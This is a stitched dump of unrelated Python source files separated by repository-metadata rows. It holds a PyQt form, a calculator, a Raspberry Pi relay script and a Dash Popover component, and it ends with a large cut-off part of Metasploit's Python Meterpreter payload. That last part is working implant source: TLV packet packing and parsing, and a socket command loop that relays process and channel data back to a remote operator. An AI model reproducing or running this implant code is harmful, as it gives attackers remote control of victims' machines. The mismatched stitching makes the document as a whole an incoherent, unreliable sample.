sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.deletedParamsEdit.sizePolicy().hasHeightForWidth())
self.deletedParamsEdit.setSizePolicy(sizePolicy)
self.deletedParamsEdit.setObjectName("deletedParamsEdit")
self.opkeysBox_2 = QtWidgets.QGroupBox(self.issueDetailBox)
self.opkeysBox_2.setGeometry(QtCore.QRect(10, 210, 153, 182))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox_2.sizePolicy().hasHeightForWidth())
self.opkeysBox_2.setSizePolicy(sizePolicy)
self.opkeysBox_2.setObjectName("opkeysBox_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.opkeysBox_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.opkey1Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey1Edit_2.setTabletTracking(True)
self.opkey1Edit_2.setText("")
self.opkey1Edit_2.setPlaceholderText("")
self.opkey1Edit_2.setObjectName("opkey1Edit_2")
self.verticalLayout_2.addWidget(self.opkey1Edit_2)
self.opkey2Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey2Edit_2.setTabletTracking(True)
self.opkey2Edit_2.setText("")
self.opkey2Edit_2.setPlaceholderText("")
self.opkey2Edit_2.setObjectName("opkey2Edit_2")
self.verticalLayout_2.addWidget(self.opkey2Edit_2)
self.opkey3Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey3Edit_2.setTabletTracking(True)
self.opkey3Edit_2.setText("")
self.opkey3Edit_2.setPlaceholderText("")
self.opkey3Edit_2.setObjectName("opkey3Edit_2")
self.verticalLayout_2.addWidget(self.opkey3Edit_2)
self.opkey4Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey4Edit_2.setTabletTracking(True)
self.opkey4Edit_2.setText("")
self.opkey4Edit_2.setPlaceholderText("")
self.opkey4Edit_2.setObjectName("opkey4Edit_2")
self.verticalLayout_2.addWidget(self.opkey4Edit_2)
self.opkey5Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey5Edit_2.setTabletTracking(True)
self.opkey5Edit_2.setText("")
self.opkey5Edit_2.setPlaceholderText("")
self.opkey5Edit_2.setObjectName("opkey5Edit_2")
self.verticalLayout_2.addWidget(self.opkey5Edit_2)
self.opkey6Edit_2 = QtWidgets.QLineEdit(self.opkeysBox_2)
self.opkey6Edit_2.setTabletTracking(True)
self.opkey6Edit_2.setText("")
self.opkey6Edit_2.setPlaceholderText("")
self.opkey6Edit_2.setClearButtonEnabled(False)
self.opkey6Edit_2.setObjectName("opkey6Edit_2")
self.verticalLayout_2.addWidget(self.opkey6Edit_2)
self.splitter_2 = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter_2.setGeometry(QtCore.QRect(10, 20, 153, 182))
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName("splitter_2")
self.opkeysBox = QtWidgets.QGroupBox(self.splitter_2)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.opkeysBox.sizePolicy().hasHeightForWidth())
self.opkeysBox.setSizePolicy(sizePolicy)
self.opkeysBox.setObjectName("opkeysBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.opkeysBox)
self.verticalLayout.setObjectName("verticalLayout")
self.opkey1Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey1Edit.setTabletTracking(True)
self.opkey1Edit.setText("")
self.opkey1Edit.setObjectName("opkey1Edit")
self.verticalLayout.addWidget(self.opkey1Edit)
self.opkey2Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey2Edit.setTabletTracking(True)
self.opkey2Edit.setText("")
self.opkey2Edit.setObjectName("opkey2Edit")
self.verticalLayout.addWidget(self.opkey2Edit)
self.opkey3Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey3Edit.setTabletTracking(True)
self.opkey3Edit.setText("")
self.opkey3Edit.setObjectName("opkey3Edit")
self.verticalLayout.addWidget(self.opkey3Edit)
self.opkey4Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey4Edit.setTabletTracking(True)
self.opkey4Edit.setText("")
self.opkey4Edit.setObjectName("opkey4Edit")
self.verticalLayout.addWidget(self.opkey4Edit)
self.opkey5Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey5Edit.setTabletTracking(True)
self.opkey5Edit.setText("")
self.opkey5Edit.setObjectName("opkey5Edit")
self.verticalLayout.addWidget(self.opkey5Edit)
self.opkey6Edit = QtWidgets.QLineEdit(self.opkeysBox)
self.opkey6Edit.setTabletTracking(True)
self.opkey6Edit.setText("")
self.opkey6Edit.setClearButtonEnabled(False)
self.opkey6Edit.setObjectName("opkey6Edit")
self.verticalLayout.addWidget(self.opkey6Edit)
self.splitter = QtWidgets.QSplitter(self.issueDetailBox)
self.splitter.setGeometry(QtCore.QRect(190, 20, 291, 361))
self.splitter.setOrientation(QtCore.Qt.Vertical)
self.splitter.setObjectName("splitter")
self.newParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsBox.sizePolicy().hasHeightForWidth())
self.newParamsBox.setSizePolicy(sizePolicy)
self.newParamsBox.setObjectName("newParamsBox")
self.newParamsEdit = QtWidgets.QTextEdit(self.newParamsBox)
self.newParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 141))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.newParamsEdit.sizePolicy().hasHeightForWidth())
self.newParamsEdit.setSizePolicy(sizePolicy)
self.newParamsEdit.setPlaceholderText("")
self.newParamsEdit.setObjectName("newParamsEdit")
self.modifiedParamsBox = QtWidgets.QGroupBox(self.splitter)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.modifiedParamsBox.sizePolicy().hasHeightForWidth())
self.modifiedParamsBox.setSizePolicy(sizePolicy)
self.modifiedParamsBox.setObjectName("modifiedParamsBox")
self.modifiedParamsEdit = QtWidgets.QTextEdit(self.modifiedParamsBox)
self.modifiedParamsEdit.setGeometry(QtCore.QRect(10, 20, 271, 121))
self.modifiedParamsEdit.setObjectName("modifiedParamsEdit")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(22, 20, 661, 81))
self.widget.setObjectName("widget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.widget)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.branchSelectBox = QtWidgets.QGroupBox(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.branchSelectBox.sizePolicy().hasHeightForWidth())
self.branchSelectBox.setSizePolicy(sizePolicy)
self.branchSelectBox.setObjectName("branchSelectBox")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.branchSelectBox)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.checkBox10x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox10x.setChecked(True)
self.checkBox10x.setObjectName("checkBox10x")
self.horizontalLayout_4.addWidget(self.checkBox10x)
self.checkBox9x = QtWidgets.QCheckBox(self.branchSelectBox)
self.checkBox9x.setChecked(True)
self.checkBox9x.setObjectName("checkBox9x")
self.horizontalLayout_4.addWidget(self.checkBox9x)
self.horizontalLayout.addWidget(self.branchSelectBox)
spacerItem1 = QtWidgets.QSpacerItem(250, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.startButton = QtWidgets.QPushButton(self.widget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.startButton.sizePolicy().hasHeightForWidth())
self.startButton.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Consolas")
font.setPointSize(14)
self.startButton.setFont(font)
self.startButton.setWhatsThis("")
self.startButton.setObjectName("startButton")
self.horizontalLayout.addWidget(self.startButton)
CCMTask.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(CCMTask)
self.statusbar.setObjectName("statusbar")
CCMTask.setStatusBar(self.statusbar)
self.retranslateUi(CCMTask)
QtCore.QMetaObject.connectSlotsByName(CCMTask)
def retranslateUi(self, CCMTask):
_translate = QtCore.QCoreApplication.translate
CCMTask.setWindowTitle(_translate("CCMTask", "CCMTask"))
self.issueBox.setTitle(_translate("CCMTask", "需求信息"))
self.ARDTSEdit.setPlaceholderText(_translate("CCMTask", "AR或者DTS编号"))
self.issueInfoEdit.setPlaceholderText(_translate("CCMTask", "需求描述信息"))
self.issueDetailBox.setTitle(_translate("CCMTask", "需求内容"))
self.deletedParamsBox.setTitle(_translate("CCMTask", "删除参数"))
self.opkeysBox_2.setTitle(_translate("CCMTask", "审核人列表"))
self.opkeysBox.setTitle(_translate("CCMTask", "运营商列表"))
self.opkey1Edit.setPlaceholderText(_translate("CCMTask", "OPkey1"))
self.opkey2Edit.setPlaceholderText(_translate("CCMTask", "OPkey2"))
self.opkey3Edit.setPlaceholderText(_translate("CCMTask", "OPkey3"))
self.opkey4Edit.setPlaceholderText(_translate("CCMTask", "OPkey4"))
self.opkey5Edit.setPlaceholderText(_translate("CCMTask", "OPkey5"))
self.opkey6Edit.setPlaceholderText(_translate("CCMTask", "OPkey6"))
self.newParamsBox.setTitle(_translate("CCMTask", "新增参数"))
self.modifiedParamsBox.setTitle(_translate("CCMTask", "修改参数"))
self.branchSelectBox.setTitle(_translate("CCMTask", "分支选择"))
self.checkBox10x.setText(_translate("CCMTask", "10.x ALL"))
self.checkBox9x.setText(_translate("CCMTask", "9.x ALL"))
self.startButton.setText(_translate("CCMTask", "Start"))
| 57 | 112 | 0.732539 | 1,365 | 15,105 | 8.028571 | 0.130403 | 0.072999 | 0.038781 | 0.042705 | 0.342823 | 0.269276 | 0.229492 | 0.209234 | 0.200839 | 0.172735 | 0 | 0.02802 | 0.163588 | 15,105 | 264 | 113 | 57.215909 | 0.839402 | 0.011718 | 0 | 0.131474 | 1 | 0 | 0.049326 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007968 | false | 0 | 0.003984 | 0 | 0.015936 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8028a1a0d82b7861ade532f7556efe716f52f14 | 1,136 | py | Python | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | from logo import logo
def add(n1, n2):
return n1 + n2
def multiply(n1, n2):
return n1 * n2
def subtract(n1, n2):
return n1 - n2
def divide(n1, n2):
return n1 / n2
symbols = ['+', '-', '/', '*']
operations = {'+': add, '-': subtract,
'*': multiply, '/': divide}
def Calci():
print(logo)
num1 = float(input("Enter 1st number: "))
for key in operations:
print(key)
while True:
choice = input("Choose an operation: ")
if choice not in symbols:
    print("WARNING! Invalid operation symbol.")
    break
num2 = float(input("Enter next number: "))
calculation_func = operations[choice]
result = calculation_func(num1, num2)
print(f"{num1} {choice} {num2} = {result}")
clear = input(
    f"Type 'y' to continue with {result}, 'new' to start a new calculation, or 'n' to exit: ")
if clear.casefold() == 'y':
num1 = result
elif clear.casefold() == 'new':
Calci()
else:
print(f"Your final result is: {result}")
break
Calci()
| 21.037037 | 100 | 0.529049 | 133 | 1,136 | 4.503759 | 0.451128 | 0.053422 | 0.066778 | 0.080134 | 0.108514 | 0.085142 | 0 | 0 | 0 | 0 | 0 | 0.031537 | 0.330106 | 1,136 | 53 | 101 | 21.433962 | 0.755585 | 0 | 0 | 0.111111 | 0 | 0.027778 | 0.221831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.138889 | false | 0 | 0.027778 | 0.111111 | 0.277778 | 0.138889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
b80d9fd4d22bb1d71b3dd29f2cdfd01260186b03 | 614 | py | Python | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | import RPi.GPIO as GPIO
from time import sleep
import sys
#setup
GPIO.setmode(GPIO.BOARD)
openRelay = 11
closeRelay = 13
GPIO.setup(openRelay, GPIO.OUT)
GPIO.setup(closeRelay, GPIO.OUT)
#get cmd args
duration = float(sys.argv[1])
opening = sys.argv[2] in ['true', 'True', '1', 'TRUE']
relay = openRelay if opening else closeRelay
#start
GPIO.output(relay, GPIO.HIGH)
print 'starting ' + ('open' if opening else 'close') + ' signal..'
#wait
print ' ' + str(duration) + 'secs'
sleep(duration)
#stop
print ' ...ending signal'
GPIO.output(relay, GPIO.LOW)
| 20.466667 | 66 | 0.640065 | 83 | 614 | 4.73494 | 0.53012 | 0.045802 | 0.066158 | 0.096692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014644 | 0.221498 | 614 | 29 | 67 | 21.172414 | 0.807531 | 0.04886 | 0 | 0 | 0 | 0 | 0.209343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.176471 | null | null | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b80eb5f1166695a86c73eccb3c18067bd324e51b | 3,725 | py | Python | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | 12 | 2020-06-06T01:22:26.000Z | 2022-03-12T00:13:42.000Z | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
class Popover(Component):
"""A Popover component.
Keyword arguments:
- children (a list of or a singular dash component, string or number; optional): The children of this component
- id (string; optional): The ID of this component, used to identify dash components
in callbacks. The ID needs to be unique across all of the
components in an app.
- style (dict; optional): Defines CSS styles which will override styles previously set.
- className (string; optional): Often used with CSS to style elements with common properties.
- key (string; optional): A unique identifier for the component, used to improve
performance by React.js while rendering components
See https://reactjs.org/docs/lists-and-keys.html for more info
- placement (a value equal to: 'auto', 'auto-start', 'auto-end', 'top', 'top-start', 'top-end', 'right', 'right-start', 'right-end', 'bottom', 'bottom-start', 'bottom-end', 'left', 'left-start', 'left-end'; optional): Specify popover placement.
- target (string; optional): ID of the component to attach the popover to.
- container (string; optional): Where to inject the popper DOM node, default body.
- is_open (boolean; optional): Whether the Popover is open or not.
- hide_arrow (boolean; optional): Hide popover arrow.
- innerClassName (string; optional): CSS class to apply to the popover.
- delay (dict; optional): Optionally override show/hide delays - default {show: 0, hide: 250}. delay has the following type: dict containing keys 'show', 'hide'.
Those keys have the following types:
- show (number; optional)
- hide (number; optional) | number
- offset (string | number; optional): Popover offset.
- loading_state (dict; optional): Object that holds the loading state object coming from dash-renderer. loading_state has the following type: dict containing keys 'is_loading', 'prop_name', 'component_name'.
Those keys have the following types:
- is_loading (boolean; optional): Determines if the component is loading or not
- prop_name (string; optional): Holds which property is loading
- component_name (string; optional): Holds the name of the component that is loading"""
@_explicitize_args
def __init__(self, children=None, id=Component.UNDEFINED, style=Component.UNDEFINED, className=Component.UNDEFINED, key=Component.UNDEFINED, placement=Component.UNDEFINED, target=Component.UNDEFINED, container=Component.UNDEFINED, is_open=Component.UNDEFINED, hide_arrow=Component.UNDEFINED, innerClassName=Component.UNDEFINED, delay=Component.UNDEFINED, offset=Component.UNDEFINED, loading_state=Component.UNDEFINED, **kwargs):
self._prop_names = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self._type = 'Popover'
self._namespace = 'dash_bootstrap_components/_components'
self._valid_wildcard_attributes = []
self.available_properties = ['children', 'id', 'style', 'className', 'key', 'placement', 'target', 'container', 'is_open', 'hide_arrow', 'innerClassName', 'delay', 'offset', 'loading_state']
self.available_wildcard_properties = []
_explicit_args = kwargs.pop('_explicit_args')
_locals = locals()
_locals.update(kwargs) # For wildcard attrs
args = {k: _locals[k] for k in _explicit_args if k != 'children'}
for k in []:
if k not in args:
raise TypeError(
'Required argument `' + k + '` was not specified.')
super(Popover, self).__init__(children=children, **args)
| 67.727273 | 432 | 0.720537 | 480 | 3,725 | 5.479167 | 0.333333 | 0.088973 | 0.020532 | 0.014449 | 0.132319 | 0.132319 | 0.109506 | 0.081369 | 0.081369 | 0.081369 | 0 | 0.001287 | 0.165906 | 3,725 | 54 | 433 | 68.981481 | 0.845188 | 0.575034 | 0 | 0 | 1 | 0 | 0.201142 | 0.023477 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b81415a0a71fcac22aeb01aa39ba0c4dc0f68e8c | 13,866 | py | Python | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2015-11-05T21:38:38.000Z | 2015-11-05T21:38:38.000Z | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | data/meterpreter/meterpreter.py | codex8/metasploit-framework | eb745af12fe591e94f8d6ce9dac0396d834991ab | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import code
import ctypes
import os
import random
import select
import socket
import struct
import subprocess
import sys
import threading
has_windll = hasattr(ctypes, 'windll')
#
# Constants
#
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
def generate_request_id():
    chars = 'abcdefghijklmnopqrstuvwxyz'
    return ''.join(random.choice(chars) for x in xrange(32))
def packet_get_tlv(pkt, tlv_type):
    offset = 0
    while (offset < len(pkt)):
        tlv = struct.unpack('>II', pkt[offset:offset+8])
        if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
            val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
            if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
                val = val.split('\x00', 1)[0]
            elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
                val = struct.unpack('>I', val)[0]
            elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
                val = bool(struct.unpack('b', val)[0])
            elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
                pass
            return {'type':tlv[1], 'length':tlv[0], 'value':val}
        offset += tlv[0]
    return {}
def tlv_pack(*args):
    if len(args) == 2:
        tlv = {'type':args[0], 'value':args[1]}
    else:
        tlv = args[0]
    data = ""
    if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
        data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
    elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
        data = struct.pack('>III', 12, tlv['type'], tlv['value'])
    elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
        data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
    elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
        data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
    elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
        data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
    elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
        data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
    return data
class STDProcessBuffer(threading.Thread):
    def __init__(self, std, is_alive):
        threading.Thread.__init__(self)
        self.std = std
        self.is_alive = is_alive
        self.data = ''
        self.data_lock = threading.RLock()

    def run(self):
        while self.is_alive():
            byte = self.std.read(1)
            self.data_lock.acquire()
            self.data += byte
            self.data_lock.release()
        self.data_lock.acquire()
        self.data += self.std.read()
        self.data_lock.release()

    def is_read_ready(self):
        return len(self.data) != 0

    def read(self, l = None):
        data = ''
        self.data_lock.acquire()
        if l == None:
            data = self.data
            self.data = ''
        else:
            data = self.data[0:l]
            self.data = self.data[l:]
        self.data_lock.release()
        return data
class STDProcess(subprocess.Popen):
    def __init__(self, *args, **kwargs):
        subprocess.Popen.__init__(self, *args, **kwargs)

    def start(self):
        self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
        self.stdout_reader.start()
        self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
        self.stderr_reader.start()
class PythonMeterpreter(object):
    def __init__(self, socket):
        self.socket = socket
        self.extension_functions = {}
        self.channels = {}
        self.interact_channels = []
        self.processes = {}
        for func in filter(lambda x: x.startswith('_core'), dir(self)):
            self.extension_functions[func[1:]] = getattr(self, func)
        self.running = True

    def register_function(self, func):
        self.extension_functions[func.__name__] = func

    def register_function_windll(self, func):
        if has_windll:
            self.register_function(func)

    def add_channel(self, channel):
        idx = 0
        while idx in self.channels:
            idx += 1
        self.channels[idx] = channel
        return idx

    def add_process(self, process):
        idx = 0
        while idx in self.processes:
            idx += 1
        self.processes[idx] = process
        return idx
    def run(self):
        while self.running:
            if len(select.select([self.socket], [], [], 0)[0]):
                request = self.socket.recv(8)
                if len(request) != 8:
                    break
                req_length, req_type = struct.unpack('>II', request)
                req_length -= 8
                request = ''
                while len(request) < req_length:
                    request += self.socket.recv(4096)
                response = self.create_response(request)
                self.socket.send(response)
            else:
                channels_for_removal = []
                channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
                for channel_id in channel_ids:
                    channel = self.channels[channel_id]
                    data = ''
                    if isinstance(channel, STDProcess):
                        if not channel_id in self.interact_channels:
                            continue
                        if channel.stdout_reader.is_read_ready():
                            data = channel.stdout_reader.read()
                        elif channel.stderr_reader.is_read_ready():
                            data = channel.stderr_reader.read()
                        elif channel.poll() != None:
                            self.handle_dead_resource_channel(channel_id)
                    elif isinstance(channel, socket._socketobject):
                        while len(select.select([channel.fileno()], [], [], 0)[0]):
                            try:
                                d = channel.recv(1)
                            except socket.error:
                                d = ''
                            if len(d) == 0:
                                self.handle_dead_resource_channel(channel_id)
                                break
                            data += d
                    if data:
                        pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
                        pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
                        pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
                        pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
                        pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
                        pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
                        pkt = struct.pack('>I', len(pkt) + 4) + pkt
                        self.socket.send(pkt)
    def handle_dead_resource_channel(self, channel_id):
        del self.channels[channel_id]
        if channel_id in self.interact_channels:
            self.interact_channels.remove(channel_id)
        pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
        pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
        pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
        pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
        pkt = struct.pack('>I', len(pkt) + 4) + pkt
        self.socket.send(pkt)
    def _core_loadlib(self, request, response):
        data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
